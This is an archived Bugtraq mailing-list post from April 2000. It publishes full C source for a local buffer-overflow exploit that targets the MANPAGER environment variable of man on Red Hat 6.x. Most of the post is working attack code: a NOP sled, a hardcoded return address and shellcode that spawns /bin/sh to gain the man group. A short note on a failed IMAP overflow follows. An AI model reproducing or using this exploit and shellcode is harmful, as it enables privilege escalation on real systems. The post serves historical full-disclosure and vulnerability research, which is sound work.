5034329 2000-04-24 21:55 /109 rader/ Postmaster
Mottagare: Bugtraq (import) <10594>
Ärende: man-exploit for MANPAGER environment and a comment about the IMA
------------------------------------------------------------
vuln
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
MIME-Version: 1.0
X-Authenticated-Sender: #0000889461@gmx.net
X-Authenticated-IP: [62.158.90.247]
X-Flags: 0001
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Message-ID: <19033.956566296@www4.gmx.net>
Date: Mon, 24 Apr 2000 10:51:36 +0200
Reply-To: psychoid@GMX.NET
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: psychoid@GMX.NET
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
For the sake of full disclosure an exploit for the MANPAGER
environment variable:
- snip -
/*
* MAN-Exploit for MANPAGER environmental variable.
* rh 6.x, tested on rh 6.1
* written by psychoid/tCl
* gives egid man.
*
* Originally discovered by lcamtuf.
* educational. yes.
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
int main(int argc, char **argv)
{
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
unsigned long offset;
unsigned long addi=0xbfffacc4;
u_char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
"\xd7\xff\xff\xff/bin/sh";
/* extreme nice shellycode */
int i;
if(argc<2)
{
offset=150;
} else {
offset=strtoul(argv[1],NULL,16);
}
printf("Building buffer for adress %-8x\n",offset+addi);
buff = malloc(4062);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;
printf("Nopping..\n");
/* filling with nops */
memset(ptr, 0x0, 4062);
memset(ptr, 0x90, 4061);
printf("Setting adress.. %-8x\n",ptr);
ptr+=0xf71;
addr_ptr=(long *)ptr;
*(addr_ptr++) = offset + addi;
/* shelly */
printf("Copying shell code..\n");
ptr=buff+0xf6f-strlen(execshell);
for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];
*ptr++='\n';
printf("Done. Setting environmental variable.\n");
setenv("MANPAGER",buff,1);
printf("Calling man..\n");
execl("/usr/bin/man", "psychoid", "man", NULL);
exit(0x0);
}
-snap-
A comment about IMAP and the possibility to gain shell access by
generating an overflow (tested for IMAP 12.250 on redhat 6.1):
IMAP filters characters which would have to be used in a changed
return adress (0xFF for example), so an exploit could crash the
active instance (which could result in a core dump to a preselected
Folder) only.
Its impossible to give a return adress to the range of the buffer.
Greetings,
psychoid
--
Sent through GMX FreeMail - http://www.gmx.net
(5034329) ------------------------------------------(Ombruten)